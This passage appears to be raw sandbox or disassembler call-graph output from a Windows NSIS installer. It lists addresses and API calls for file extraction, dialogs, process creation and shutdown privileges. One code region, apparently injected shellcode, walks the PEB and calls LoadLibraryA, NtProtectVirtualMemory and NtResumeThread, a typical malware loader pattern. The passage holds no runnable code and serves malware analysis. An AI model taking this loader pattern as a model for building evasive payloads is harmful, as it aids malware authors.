7586 405fdb 7585->7586 7587 405fac lstrcmpiA 7585->7587 7586->7573 7586->7574 7587->7586 7588 405fca CharNextA 7587->7588 7588->7585 7590 4060fd GlobalFree 7589->7590 7590->7567 8461 401c43 8462 402d84 17 API calls 8461->8462 8463 401c4a 8462->8463 8464 402d84 17 API calls 8463->8464 8465 401c57 8464->8465 8466 401c6c 8465->8466 8467 402da6 17 API calls 8465->8467 8468 401c7c 8466->8468 8471 402da6 17 API calls 8466->8471 8467->8466 8469 401cd3 8468->8469 8470 401c87 8468->8470 8473 402da6 17 API calls 8469->8473 8472 402d84 17 API calls 8470->8472 8471->8468 8474 401c8c 8472->8474 8475 401cd8 8473->8475 8476 402d84 17 API calls 8474->8476 8477 402da6 17 API calls 8475->8477 8478 401c98 8476->8478 8479 401ce1 FindWindowExW 8477->8479 8480 401cc3 SendMessageW 8478->8480 8481 401ca5 SendMessageTimeoutW 8478->8481 8482 401d03 8479->8482 8480->8482 8481->8482 9023 71031000 9026 7103101b 9023->9026 9027 710315b6 GlobalFree 9026->9027 9028 71031020 9027->9028 9029 71031027 GlobalAlloc 9028->9029 9030 71031024 9028->9030 9029->9030 9031 710315dd 3 API calls 9030->9031 9032 71031019 9031->9032 9033 2f4e1f3 9034 2f4e40d GetPEB 9033->9034 9035 2f4e207 9033->9035 9038 2f4e2b6 9034->9038 9035->9035 9036 2f4e296 GetPEB 9035->9036 9037 2f46a21 9035->9037 9036->9038 9038->9038 9039 2f4adff 9040 2f4aef2 9039->9040 9041 2f57709 NtResumeThread 9040->9041 9042 2f4af9a 9041->9042 9043 2f57709 NtResumeThread 9042->9043 9044 2f4b17f 9042->9044 9045 2f46986 9042->9045 9043->9044 9044->9045 9046 2f57709 NtResumeThread 9044->9046 9046->9045 8021 2f539f8 8022 2f53a26 CreateFileA 8021->8022 8483 401e4e GetDC 8484 402d84 17 API calls 8483->8484 8485 401e60 GetDeviceCaps MulDiv ReleaseDC 8484->8485 8486 402d84 17 API calls 8485->8486 8487 401e91 8486->8487 8488 40657a 17 API calls 8487->8488 8489 401ece CreateFontIndirectW 8488->8489 8490 402638 8489->8490 8491 7103170d 8497 710315b6 8491->8497 8493 7103176b GlobalFree 8494 71031740 8494->8493 8495 71031725 8495->8493 8495->8494 8496 71031757 VirtualFree 8495->8496 8496->8493 8499 710315bc 8497->8499 8498 710315c2 8498->8495 8499->8498 8500 710315ce GlobalFree 8499->8500 8500->8495 9047 402950 9048 402da6 17 API calls 9047->9048 9050 40295c 9048->9050 9049 402972 9052 406008 2 API calls 9049->9052 9050->9049 9051 402da6 17 API calls 9050->9051 9051->9049 9053 402978 9052->9053 9075 40602d GetFileAttributesW CreateFileW 9053->9075 9055 402985 9056 402a3b 9055->9056 9057 4029a0 GlobalAlloc 9055->9057 9058 402a23 9055->9058 9059 402a42 DeleteFileW 9056->9059 9060 402a55 9056->9060 9057->9058 9061 4029b9 9057->9061 9062 4032b4 31 API calls 9058->9062 9059->9060 9076 4034e5 SetFilePointer 9061->9076 9064 402a30 CloseHandle 9062->9064 9064->9056 9065 4029bf 9066 4034cf ReadFile 9065->9066 9067 4029c8 GlobalAlloc 9066->9067 9068 4029d8 9067->9068 9069 402a0c 9067->9069 9071 4032b4 31 API calls 9068->9071 9070 4060df WriteFile 9069->9070 9072 402a18 GlobalFree 9070->9072 9074 4029e5 9071->9074 9072->9058 9073 402a03 GlobalFree 9073->9069 9074->9073 9075->9055 9076->9065 9077 404950 9078 404499 18 API calls 9077->9078 9079 404960 SetDlgItemTextW 9078->9079 9080 404500 8 API calls 9079->9080 9081 404985 9080->9081 8501 2f484e7 8502 2f484c6 8501->8502 8504 2f48599 8501->8504 8502->8501 8502->8504 8511 2f4e980 8502->8511 8518 2f493d1 GetPEB 8504->8518 8506 2f485d6 8509 2f485f6 8506->8509 8525 2f4a20e 8506->8525 8508 2f48ee8 8509->8508 8510 2f4a20e 5 API calls 8509->8510 8510->8508 8514 2f4e98b 8511->8514 8512 2f4a256 5 API calls 8512->8514 8513 2f547be 5 API calls 8513->8514 8514->8511 8514->8512 8514->8513 8515 2f53557 8514->8515 8516 2f5355d 5 API calls 8515->8516 8517 2f540c3 8516->8517 8519 2f49426 8518->8519 8520 2f54888 LoadLibraryA 8519->8520 8521 2f54ee4 5 API calls 8519->8521 8524 2f499ef 8519->8524 8522 2f54893 8520->8522 8523 2f5486f 8521->8523 8522->8506 8523->8520 8524->8506 8526 2f5344f 8525->8526 8532 2f4e980 8526->8532 8534 2f4a215 8526->8534 8528 2f4a256 5 API calls 8528->8532 8529 2f547be 5 API calls 8529->8532 8530 2f53557 8531 2f5355d 5 API calls 8530->8531 8533 2f540c3 8531->8533 8532->8528 8532->8529 8532->8530 8535 2f55355 5 API calls 8534->8535 8538 2f4a249 8535->8538 8536 2f4a256 5 API calls 8536->8538 8537 2f547be 5 API calls 8537->8538 8538->8536 8538->8537 8539 2f53557 8538->8539 8540 2f5355d 5 API calls 8539->8540 8541 2f540c3 8540->8541 9082 401956 9083 402da6 17 API calls 9082->9083 9084 40195d lstrlenW 9083->9084 9085 402638 9084->9085 8542 404658 8543 404670 8542->8543 8547 40478a 8542->8547 8548 404499 18 API calls 8543->8548 8544 4047f4 8545 4048be 8544->8545 8546 4047fe GetDlgItem 8544->8546 8553 404500 8 API calls 8545->8553 8549 404818 8546->8549 8550 40487f 8546->8550 8547->8544 8547->8545 8551 4047c5 GetDlgItem SendMessageW 8547->8551 8552 4046d7 8548->8552 8549->8550 8554 40483e SendMessageW LoadCursorW SetCursor 8549->8554 8550->8545 8555 404891 8550->8555 8575 4044bb KiUserCallbackDispatcher 8551->8575 8557 404499 18 API calls 8552->8557 8558 4048b9 8553->8558 8579 404907 8554->8579 8560 4048a7 8555->8560 8561 404897 SendMessageW 8555->8561 8563 4046e4 CheckDlgButton 8557->8563 8560->8558 8565 4048ad SendMessageW 8560->8565 8561->8560 8562 4047ef 8576 4048e3 8562->8576 8573 4044bb KiUserCallbackDispatcher 8563->8573 8565->8558 8568 404702 GetDlgItem 8574 4044ce SendMessageW 8568->8574 8570 404718 SendMessageW 8571 404735 GetSysColor 8570->8571 8572 40473e SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 8570->8572 8571->8572 8572->8558 8573->8568 8574->8570 8575->8562 8577 4048f1 8576->8577 8578 4048f6 SendMessageW 8576->8578 8577->8578 8578->8544 8582 405b63 ShellExecuteExW 8579->8582 8581 40486d LoadCursorW SetCursor 8581->8550 8582->8581 9086 2f4afed 9087 2f4b03b 9086->9087 9088 2f57709 NtResumeThread 9087->9088 9089 2f4b17f 9087->9089 9090 2f46986 9087->9090 9088->9089 9089->9090 9091 2f57709 NtResumeThread 9089->9091 9091->9090 9092 402b59 9093 402b60 9092->9093 9094 402bab 9092->9094 9096 402ba9 9093->9096 9097 402d84 17 API calls 9093->9097 9095 40690a 5 API calls 9094->9095 9098 402bb2 9095->9098 9099 402b6e 9097->9099 9100 402da6 17 API calls 9098->9100 9101 402d84 17 API calls 9099->9101 9102 402bbb 9100->9102 9105 402b7a 9101->9105 9102->9096 9103 402bbf IIDFromString 9102->9103 9103->9096 9104 402bce 9103->9104 9104->9096 9110 40653d lstrcpynW 9104->9110 9109 406484 wsprintfW 9105->9109 9107 402beb CoTaskMemFree 9107->9096 9109->9096 9110->9107 8369 2f478e8 8371 2f475df 8369->8371 8370 2f478b6 8371->8370 8373 2f56fc6 8371->8373 8374 2f56ecf 8373->8374 8377 2f57165 8374->8377 8376 2f57162 8376->8371 8378 2f57203 NtProtectVirtualMemory 8377->8378 8378->8376 8383 40175c 8384 402da6 17 API calls 8383->8384 8385 401763 8384->8385 8386 40605c 2 API calls 8385->8386 8387 40176a 8386->8387 8388 40605c 2 API calls 8387->8388 8388->8387 9111 401d5d 9112 402d84 17 API calls 9111->9112 9113 401d6e SetWindowLongW 9112->9113 9114 402c2a 9113->9114 9115 2f467d4 9116 2f547be 5 API calls 9115->9116 9117 2f467de 9116->9117 9118 401563 9119 402ba4 9118->9119 9122 406484 wsprintfW 9119->9122 9121 402ba9 9122->9121 9123 401968 9124 402d84 17 API calls 9123->9124 9125 40196f 9124->9125 9126 402d84 17 API calls 9125->9126 9127 40197c 9126->9127 9128 402da6 17 API calls 9127->9128 9129 401993 lstrlenW 9128->9129 9131 4019a4 9129->9131 9130 4019e5 9131->9130 9135 40653d lstrcpynW 9131->9135 9133 4019d5 9133->9130 9134 4019da lstrlenW 9133->9134 9134->9130 9135->9133 8600 40166a 8601 402da6 17 API calls 8600->8601 8602 401670 8601->8602 8603 406873 2 API calls 8602->8603 8604 401676 8603->8604 8024 40176f 8025 402da6 17 API calls 8024->8025 8026 401776 8025->8026 8027 401796 8026->8027 8028 40179e 8026->8028 8063 40653d lstrcpynW 8027->8063 8064 40653d lstrcpynW 8028->8064 8031 4017a9 8033 405e0c 3 API calls 8031->8033 8032 40179c 8035 4067c4 5 API calls 8032->8035 8034 4017af lstrcatW 8033->8034 8034->8032 8052 4017bb 8035->8052 8036 406873 2 API calls 8036->8052 8037 406008 2 API calls 8037->8052 8039 4017cd CompareFileTime 8039->8052 8040 40188d 8042 40559f 24 API calls 8040->8042 8041 401864 8043 40559f 24 API calls 8041->8043 8051 401879 8041->8051 8045 401897 8042->8045 8043->8051 8044 40653d lstrcpynW 8044->8052 8046 4032b4 31 API calls 8045->8046 8047 4018aa 8046->8047 8048 4018be SetFileTime 8047->8048 8050 4018d0 CloseHandle 8047->8050 8048->8050 8049 40657a 17 API calls 8049->8052 8050->8051 8053 4018e1 8050->8053 8052->8036 8052->8037 8052->8039 8052->8040 8052->8041 8052->8044 8052->8049 8060 405b9d MessageBoxIndirectW 8052->8060 8062 40602d GetFileAttributesW CreateFileW 8052->8062 8054 4018e6 8053->8054 8055 4018f9 8053->8055 8057 40657a 17 API calls 8054->8057 8056 40657a 17 API calls 8055->8056 8059 401901 8056->8059 8058 4018ee lstrcatW 8057->8058 8058->8059 8059->8051 8061 405b9d MessageBoxIndirectW 8059->8061 8060->8052 8061->8051 8062->8052 8063->8032 8064->8031 8605 2f45cdb 8606 2f45d23 8605->8606 8607 2f547be 5 API calls 8606->8607 8608 2f45d38 8607->8608 8609 2f547be 5 API calls 8608->8609 8610 2f45d52 8609->8610 8611 2f4b2c5 8612 2f4b2f2 8611->8612 8613 2f4b2ca 8611->8613 8614 2f57709 NtResumeThread 8612->8614 8615 2f4b376 8614->8615 8616 401a72 8617 402d84 17 API calls 8616->8617 8618 401a7b 8617->8618 8619 402d84 17 API calls 8618->8619 8620 401a20 8619->8620 9136 401573 9137 401583 ShowWindow 9136->9137 9138 40158c 9136->9138 9137->9138 9139 402c2a 9138->9139 9140 40159a ShowWindow 9138->9140 9140->9139 9141 2f475c1 9143 2f475df 9141->9143 9142 2f56fc6 NtProtectVirtualMemory 9142->9143 9143->9142 9143->9143 9144 2f478b6 9143->9144 9145 401b77 9146 402da6 17 API calls 9145->9146 9147 401b7e 9146->9147 9148 402d84 17 API calls 9147->9148 9149 401b87 wsprintfW 9148->9149 9150 402c2a 9149->9150 8625 40167b 8626 402da6 17 API calls 8625->8626 8627 401682 8626->8627 8628 402da6 17 API calls 8627->8628 8629 40168b 8628->8629 8630 402da6 17 API calls 8629->8630 8631 401694 MoveFileW 8630->8631 8632 4016a7 8631->8632 8638 4016a0 8631->8638 8633 4022f6 8632->8633 8635 406873 2 API calls 8632->8635 8634 401423 24 API calls 8634->8633 8636 4016b6 8635->8636 8636->8633 8637 4062fd 36 API calls 8636->8637 8637->8638 8638->8634 9151 7103103d 9152 7103101b 5 API calls 9151->9152 9153 71031056 9152->9153 8646 401000 8647 401037 BeginPaint GetClientRect 8646->8647 8648 40100c DefWindowProcW 8646->8648 8650 4010f3 8647->8650 8651 401179 8648->8651 8652 401073 CreateBrushIndirect FillRect DeleteObject 8650->8652 8653 4010fc 8650->8653 8652->8650 8654 401102 CreateFontIndirectW 8653->8654 8655 401167 EndPaint 8653->8655 8654->8655 8656 401112 6 API calls 8654->8656 8655->8651 8656->8655 8657 71032d43 8658 71032d5b 8657->8658 8659 7103162f 2 API calls 8658->8659 8660 71032d76 8659->8660 9154 401503 9155 40151e 9154->9155 9156 40150b 9154->9156 9157 402d84 17 API calls 9156->9157 9157->9155 8661 402c05 SendMessageW 8662 402c1f InvalidateRect 8661->8662 8663 402c2a 8661->8663 8662->8663 9158 404f06 GetDlgItem GetDlgItem 9159 404f58 7 API calls 9158->9159 9166 40517d 9158->9166 9160 404ff2 SendMessageW 9159->9160 9161 404fff DeleteObject 9159->9161 9160->9161 9162 405008 9161->9162 9164 40503f 9162->9164 9167 40657a 17 API calls 9162->9167 9163 40525f 9165 40530b 9163->9165 9169 405170 9163->9169 9175 4052b8 SendMessageW 9163->9175 9168 404499 18 API calls 9164->9168 9170 405315 SendMessageW 9165->9170 9171 40531d 9165->9171 9166->9163 9190 4051ec 9166->9190 9212 404e54 SendMessageW 9166->9212 9172 405021 SendMessageW SendMessageW 9167->9172 9173 405053 9168->9173 9177 404500 8 API calls 9169->9177 9170->9171 9182 405336 9171->9182 9183 40532f ImageList_Destroy 9171->9183 9187 405346 9171->9187 9172->9162 9174 404499 18 API calls 9173->9174 9191 405064 9174->9191 9175->9169 9180 4052cd SendMessageW 9175->9180 9176 405251 SendMessageW 9176->9163 9181 40550c 9177->9181 9179 4054c0 9179->9169 9188 4054d2 ShowWindow GetDlgItem ShowWindow 9179->9188 9185 4052e0 9180->9185 9186 40533f GlobalFree 9182->9186 9182->9187 9183->9182 9184 40513f GetWindowLongW SetWindowLongW 9189 405158 9184->9189 9196 4052f1 SendMessageW 9185->9196 9186->9187 9187->9179 9204 405381 9187->9204 9217 404ed4 9187->9217 9188->9169 9192 405175 9189->9192 9193 40515d ShowWindow 9189->9193 9190->9163 9190->9176 9191->9184 9195 4050b7 SendMessageW 9191->9195 9197 40513a 9191->9197 9199 4050f5 SendMessageW 9191->9199 9200 405109 SendMessageW 9191->9200 9211 4044ce SendMessageW 9192->9211 9210 4044ce SendMessageW 9193->9210 9195->9191 9196->9165 9197->9184 9197->9189 9199->9191 9200->9191 9202 40548b 9203 405496 InvalidateRect 9202->9203 9206 4054a2 9202->9206 9203->9206 9205 4053af SendMessageW 9204->9205 9209 4053c5 9204->9209 9205->9209 9206->9179 9226 404e0f 9206->9226 9208 405439 SendMessageW SendMessageW 9208->9209 9209->9202 9209->9208 9210->9169 9211->9166 9213 404eb3 SendMessageW 9212->9213 9214 404e77 GetMessagePos ScreenToClient SendMessageW 9212->9214 9216 404eab 9213->9216 9215 404eb0 9214->9215 9214->9216 9215->9213 9216->9190 9229 40653d lstrcpynW 9217->9229 9219 404ee7 9230 406484 wsprintfW 9219->9230 9221 404ef1 9222 40140b 2 API calls 9221->9222 9223 404efa 9222->9223 9231 40653d lstrcpynW 9223->9231 9225 404f01 9225->9204 9232 404d46 9226->9232 9228 404e24 9228->9179 9229->9219 9230->9221 9231->9225 9233 404d5f 9232->9233 9234 40657a 17 API calls 9233->9234 9235 404dc3 9234->9235 9236 40657a 17 API calls 9235->9236 9237 404dce 9236->9237 9238 40657a 17 API calls 9237->9238 9239 404de4 lstrlenW wsprintfW SetDlgItemTextW 9238->9239 9239->9228 8664 2f4b0bd 8665 2f4b134 8664->8665 8666 2f4b376 8664->8666 8667 2f57709 NtResumeThread 8665->8667 8668 2f46986 8665->8668 8669 2f4b17f 8665->8669 8667->8669 8669->8666 8670 2f57709 NtResumeThread 8669->8670 8670->8666 7746 40290b 7747 402da6 17 API calls 7746->7747 7748 402912 FindFirstFileW 7747->7748 7749 402925 7748->7749 7750 40293a 7748->7750 7751 402943 7750->7751 7754 406484 wsprintfW 7750->7754 7755 40653d lstrcpynW 7751->7755 7754->7751 7755->7749 9240 40190c 9241 401943 9240->9241 9242 402da6 17 API calls 9241->9242 9243 401948 9242->9243 9244 405c49 67 API calls 9243->9244 9245 401951 9244->9245 9246 40190f 9247 402da6 17 API calls 9246->9247 9248 401916 9247->9248 9249 405b9d MessageBoxIndirectW 9248->9249 9250 40191f 9249->9250 9251 401f12 9252 402da6 17 API calls 9251->9252 9253 401f18 9252->9253 9254 402da6 17 API calls 9253->9254 9255 401f21 9254->9255 9256 402da6 17 API calls 9255->9256 9257 401f2a 9256->9257 9258 402da6 17 API calls 9257->9258 9259 401f33 9258->9259 9260 401423 24 API calls 9259->9260 9261 401f3a 9260->9261 9268 405b63 ShellExecuteExW 9261->9268 9263 401f82 9265 40292e 9263->9265 9269 4069b5 WaitForSingleObject 9263->9269 9266 401f9f CloseHandle 9266->9265 9268->9263 9270 4069cf 9269->9270 9271 4069e1 GetExitCodeProcess 9270->9271 9272 406946 2 API calls 9270->9272 9271->9266 9273 4069d6 WaitForSingleObject 9272->9273 9273->9270 8678 2f494a7 8679 2f49440 8678->8679 8680 2f54888 LoadLibraryA 8679->8680 8681 2f54ee4 5 API calls 8679->8681 8684 2f499ef 8679->8684 8682 2f54893 8680->8682 8683 2f5486f 8681->8683 8683->8680 9274 405513 9275 405523 9274->9275 9276 405537 9274->9276 9277 405529 9275->9277 9286 405580 9275->9286 9278 40553f IsWindowVisible 9276->9278 9284 405556 9276->9284 9279 4044e5 SendMessageW 9277->9279 9280 40554c 9278->9280 9278->9286 9282 405533 9279->9282 9283 404e54 5 API calls 9280->9283 9281 405585 CallWindowProcW 9281->9282 9283->9284 9284->9281 9285 404ed4 4 API calls 9284->9285 9285->9286 9286->9281 8685 404614 8686 404628 8685->8686 8687 40462a WideCharToMultiByte 8685->8687 8686->8687 8688 2f4cea1 8689 2f4cf0c 8688->8689 8690 2f57709 NtResumeThread 8689->8690 8691 2f4ca39 8690->8691 8691->8691 8692 2f45ca2 8693 2f55355 5 API calls 8692->8693 8694 2f45cd3 8693->8694 8695 2f547be 5 API calls 8694->8695 8696 2f45d38 8695->8696 8697 2f547be 5 API calls 8696->8697 8698 2f45d52 8697->8698 9287 401d17 9288 402d84 17 API calls 9287->9288 9289 401d1d IsWindow 9288->9289 9290 401a20 9289->9290 9291 71031058 9293 71031074 9291->9293 9292 710310dd 9293->9292 9294 710315b6 GlobalFree 9293->9294 9295 71031092 9293->9295 9294->9295 9296 710315b6 GlobalFree 9295->9296 9297 710310a2 9296->9297 9298 710310b2 9297->9298 9299 710310a9 GlobalSize 9297->9299 9300 710310b6 GlobalAlloc 9298->9300 9301 710310c7 9298->9301 9299->9298 9302 710315dd 3 API calls 9300->9302 9303 710310d2 GlobalFree 9301->9303 9302->9301 9303->9292 8699 40261c 8700 402da6 17 API calls 8699->8700 8701 402623 8700->8701 8704 40602d GetFileAttributesW CreateFileW 8701->8704 8703 40262f 8704->8703 7703 40252a 7714 402de6 7703->7714 7706 402da6 17 API calls 7707 40253d 7706->7707 7708 402548 RegQueryValueExW 7707->7708 7709 40292e 7707->7709 7710 402568 7708->7710 7711 40256e RegCloseKey 7708->7711 7710->7711 7719 406484 wsprintfW 7710->7719 7711->7709 7715 402da6 17 API calls 7714->7715 7716 402dfd 7715->7716 7717 4063aa RegOpenKeyExW 7716->7717 7718 402534 7717->7718 7718->7706 7719->7711 8713 40202a 8714 402da6 17 API calls 8713->8714 8715 402031 8714->8715 8716 40690a 5 API calls 8715->8716 8717 402040 8716->8717 8718 40205c GlobalAlloc 8717->8718 8720 4020cc 8717->8720 8719 402070 8718->8719 8718->8720 8721 40690a 5 API calls 8719->8721 8722 402077 8721->8722 8723 40690a 5 API calls 8722->8723 8724 402081 8723->8724 8724->8720 8728 406484 wsprintfW 8724->8728 8726 4020ba 8729 406484 wsprintfW 8726->8729 8728->8726 8729->8720 9308 2f4679f 9312 2f56353 9308->9312 9310 2f46748 9310->9308 9311 2f467b3 9310->9311 9313 2f563ab 9312->9313 9314 2f547be 5 API calls 9313->9314 9315 2f563b3 9314->9315 9316 2f547be 5 API calls 9315->9316 9317 2f563ca 9316->9317 9318 2f563d3 GetPEB 9317->9318 9319 2f5644e 9318->9319 9320 2f57165 NtProtectVirtualMemory 9319->9320 9321 2f46a21 9319->9321 9323 2f564a8 9320->9323 9321->9310 9322 2f56b96 9322->9310 9323->9322 9324 2f566d5 9323->9324 9327 2f4e980 9323->9327 9326 2f56bde 9324->9326 9339 2f56787 9324->9339 9325 2f4a256 5 API calls 9325->9327 9331 2f56ec3 9326->9331 9333 2f56ccc 9326->9333 9327->9325 9330 2f547be 5 API calls 9327->9330 9332 2f53557 9327->9332 9328 2f57165 NtProtectVirtualMemory 9329 2f57162 9328->9329 9329->9310 9330->9327 9331->9328 9334 2f5355d 5 API calls 9332->9334 9335 2f57165 NtProtectVirtualMemory 9333->9335 9336 2f540c3 9334->9336 9338 2f56ec0 9335->9338 9337 2f57165 NtProtectVirtualMemory 9337->9322 9338->9310 9339->9337 7756 40352d SetErrorMode GetVersionExW 7757 4035b7 7756->7757 7758 40357f GetVersionExW 7756->7758 7759 40690a 5 API calls 7757->7759 7762 403610 7757->7762 7758->7757 7759->7762 7760 40689a 3 API calls 7761 403626 lstrlenA 7760->7761 7761->7762 7763 403636 7761->7763 7762->7760 7764 40690a 5 API calls 7763->7764 7765 40363d 7764->7765 7766 40690a 5 API calls 7765->7766 7767 403644 7766->7767 7768 40690a 5 API calls 7767->7768 7769 403650 #17 OleInitialize SHGetFileInfoW 7768->7769 7847 40653d lstrcpynW 7769->7847 7772 40369d GetCommandLineW 7848 40653d lstrcpynW 7772->7848 7774 4036af 7775 405e39 CharNextW 7774->7775 7776 4036d5 CharNextW 7775->7776 7784 4036e6 7776->7784 7777 4037e4 7778 4037f8 GetTempPathW 7777->7778 7849 4034fc 7778->7849 7780 403810 7781 403814 GetWindowsDirectoryW lstrcatW 7780->7781 7782 40386a DeleteFileW 7780->7782 7785 4034fc 12 API calls 7781->7785 7859 40307d GetTickCount GetModuleFileNameW 7782->7859 7783 405e39 CharNextW 7783->7784 7784->7777 7784->7783 7790 4037e6 7784->7790 7787 403830 7785->7787 7787->7782 7789 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 7787->7789 7788 40387d 7791 403941 7788->7791 7794 403932 7788->7794 7798 405e39 CharNextW 7788->7798 7793 4034fc 12 API calls 7789->7793 7943 40653d lstrcpynW 7790->7943 7951 403b12 7791->7951 7797 403862 7793->7797 7887 403bec 7794->7887 7797->7782 7797->7791 7811 40389f 7798->7811 7800 403a69 7958 405b9d 7800->7958 7801 403a7e 7803 403a86 GetCurrentProcess OpenProcessToken 7801->7803 7804 403afc ExitProcess 7801->7804 7809 403acc 7803->7809 7810 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 7803->7810 7806 403908 7813 405f14 18 API calls 7806->7813 7807 403949 7812 405b08 5 API calls 7807->7812 7814 40690a 5 API calls 7809->7814 7810->7809 7811->7806 7811->7807 7815 40394e lstrcatW 7812->7815 7816 403914 7813->7816 7817 403ad3 7814->7817 7818 40396a lstrcatW lstrcmpiW 7815->7818 7819 40395f lstrcatW 7815->7819 7816->7791 7944 40653d lstrcpynW 7816->7944 7820 403ae8 ExitWindowsEx 7817->7820 7821 403af5 7817->7821 7818->7791 7822 40398a 7818->7822 7819->7818 7820->7804 7820->7821 7962 40140b 7821->7962 7825 403996 7822->7825 7826 40398f 7822->7826 7829 405aeb 2 API calls 7825->7829 7828 405a6e 4 API calls 7826->7828 7827 403927 7945 40653d lstrcpynW 7827->7945 7831 403994 7828->7831 7832 40399b SetCurrentDirectoryW 7829->7832 7831->7832 7833 4039b8 7832->7833 7834 4039ad 7832->7834 7947 40653d lstrcpynW 7833->7947 7946 40653d lstrcpynW 7834->7946 7837 40657a 17 API calls 7838 4039fa DeleteFileW 7837->7838 7839 403a06 CopyFileW 7838->7839 7840 4039c5 7838->7840 7839->7840 7840->7837 7841 403a50 7840->7841 7843 4062fd 36 API calls 7840->7843 7844 40657a 17 API calls 7840->7844 7846 403a3a CloseHandle 7840->7846 7948 405b20 CreateProcessW 7840->7948 7842 4062fd 36 API calls 7841->7842 7842->7791 7843->7840 7844->7840 7846->7840 7847->7772 7848->7774 7850 4067c4 5 API calls 7849->7850 7852 403508 7850->7852 7851 403512 7851->7780 7852->7851 7853 405e0c 3 API calls 7852->7853 7854 40351a 7853->7854 7855 405aeb 2 API calls 7854->7855 7856 403520 7855->7856 7965 40605c 7856->7965 7969 40602d GetFileAttributesW CreateFileW 7859->7969 7861 4030bd 7881 4030cd 7861->7881 7970 40653d lstrcpynW 7861->7970 7863 4030e3 7864 405e58 2 API calls 7863->7864 7865 4030e9 7864->7865 7971 40653d lstrcpynW 7865->7971 7867 4030f4 GetFileSize 7868 4031ee 7867->7868 7886 40310b 7867->7886 7972 403019 7868->7972 7870 4031f7 7872 403227 GlobalAlloc 7870->7872 7870->7881 7984 4034e5 SetFilePointer 7870->7984 7871 4034cf ReadFile 7871->7886 7983 4034e5 SetFilePointer 7872->7983 7874 40325a 7878 403019 6 API calls 7874->7878 7876 403210 7879 4034cf ReadFile 7876->7879 7877 403242 7880 4032b4 31 API calls 7877->7880 7878->7881 7882 40321b 7879->7882 7884 40324e 7880->7884 7881->7788 7882->7872 7882->7881 7883 403019 6 API calls 7883->7886 7884->7881 7884->7884 7885 40328b SetFilePointer 7884->7885 7885->7881 7886->7868 7886->7871 7886->7874 7886->7881 7886->7883 7888 40690a 5 API calls 7887->7888 7889 403c00 7888->7889 7890 403c06 7889->7890 7891 403c18 7889->7891 8004 406484 wsprintfW 7890->8004 7892 40640b 3 API calls 7891->7892 7893 403c48 7892->7893 7895 403c67 lstrcatW 7893->7895 7897 40640b 3 API calls 7893->7897 7896 403c16 7895->7896 7989 403ec2 7896->7989 7897->7895 7900 405f14 18 API calls 7901 403c99 7900->7901 7902 403d2d 7901->7902 7904 40640b 3 API calls 7901->7904 7903 405f14 18 API calls 7902->7903 7905 403d33 7903->7905 7911 403ccb 7904->7911 7906 403d43 LoadImageW 7905->7906 7907 40657a 17 API calls 7905->7907 7908 403de9 7906->7908 7909 403d6a RegisterClassW 7906->7909 7907->7906 7913 40140b 2 API calls 7908->7913 7912 403da0 SystemParametersInfoW CreateWindowExW 7909->7912 7942 403df3 7909->7942 7910 403cec lstrlenW 7915 403d20 7910->7915 7916 403cfa lstrcmpiW 7910->7916 7911->7902 7911->7910 7914 405e39 CharNextW 7911->7914 7912->7908 7917 403def 7913->7917 7918 403ce9 7914->7918 7920 405e0c 3 API calls 7915->7920 7916->7915 7919 403d0a GetFileAttributesW 7916->7919 7922 403ec2 18 API calls 7917->7922 7917->7942 7918->7910 7921 403d16 7919->7921 7923 403d26 7920->7923 7921->7915 7925 405e58 2 API calls 7921->7925 7926 403e00 7922->7926 8005 40653d lstrcpynW 7923->8005 7925->7915 7927 403e0c ShowWindow 7926->7927 7928 403e8f 7926->7928 7929 40689a 3 API calls 7927->7929 7997 405672 OleInitialize 7928->7997 7931 403e24 7929->7931 7933 403e32 GetClassInfoW 7931->7933 7936 40689a 3 API calls 7931->7936 7932 403e95 7934 403eb1 7932->7934 7935 403e99 7932->7935 7938 403e46 GetClassInfoW RegisterClassW 7933->7938 7939 403e5c DialogBoxParamW 7933->7939 7937 40140b 2 API calls 7934->7937 7940 40140b 2 API calls 7935->7940 7935->7942 7936->7933 7937->7942 7938->7939 7941 40140b 2 API calls 7939->7941 7940->7942 7941->7942 7942->7791 7943->7778 7944->7827 7945->7794 7946->7833 7947->7840 7949 405b53 CloseHandle 7948->7949 7950 405b5f 7948->7950 7949->7950 7950->7840 7952 403b2a 7951->7952 7953 403b1c CloseHandle 7951->7953 8017 403b57 7952->8017 7953->7952 7956 405c49 67 API calls 7957 403a5e OleUninitialize 7956->7957 7957->7800 7957->7801 7959 405bb2 7958->7959 7960 403a76 ExitProcess 7959->7960 7961 405bc6 MessageBoxIndirectW 7959->7961 7961->7960 7963 401389 2 API calls 7962->7963 7964 401420 7963->7964 7964->7804 7966 406069 GetTickCount GetTempFileNameW 7965->7966 7967 40609f 7966->7967 7968 40352b 7966->7968 7967->7966 7967->7968 7968->7780 7969->7861 7970->7863 7971->7867 7973 403022 7972->7973 7974 40303a 7972->7974 7975 403032 7973->7975 7976 40302b DestroyWindow 7973->7976 7977 403042 7974->7977 7978 40304a GetTickCount 7974->7978 7975->7870 7976->7975 7985 406946 7977->7985 7980 403058 CreateDialogParamW ShowWindow 7978->7980 7981 40307b 7978->7981 7980->7981 7981->7870 7983->7877 7984->7876 7986 406963 PeekMessageW 7985->7986 7987 403048 7986->7987 7988 406959 DispatchMessageW 7986->7988 7987->7870 7988->7986 7990 403ed6 7989->7990 8006 406484 wsprintfW 7990->8006 7992 403f47 8007 403f7b 7992->8007 7994 403c77 7994->7900 7995 403f4c 7995->7994 7996 40657a 17 API calls 7995->7996 7996->7995 8010 4044e5 7997->8010 7999 4056bc 8000 4044e5 SendMessageW 7999->8000 8002 4056ce OleUninitialize 8000->8002 8001 405695 8001->7999 8013 401389 8001->8013 8002->7932 8004->7896 8005->7902 8006->7992 8008 40657a 17 API calls 8007->8008 8009 403f89 SetWindowTextW 8008->8009 8009->7995 8011 4044fd 8010->8011 8012 4044ee SendMessageW 8010->8012 8011->8001 8012->8011 8015 401390 8013->8015 8014 4013fe 8014->8001 8015->8014 8016 4013cb MulDiv SendMessageW 8015->8016 8016->8015 8018 403b65 8017->8018 8019 403b2f 8018->8019 8020 403b6a FreeLibrary GlobalFree 8018->8020 8019->7956 8020->8019 8020->8020 8730 401a30 8731 402da6 17 API calls 8730->8731 8732 401a39 ExpandEnvironmentStringsW 8731->8732 8733 401a4d 8732->8733 8735 401a60 8732->8735 8734 401a52 lstrcmpW 8733->8734 8733->8735 8734->8735 8736 402434 8737 402467 8736->8737 8738 40243c 8736->8738 8740 402da6 17 API calls 8737->8740 8739 402de6 17 API calls 8738->8739 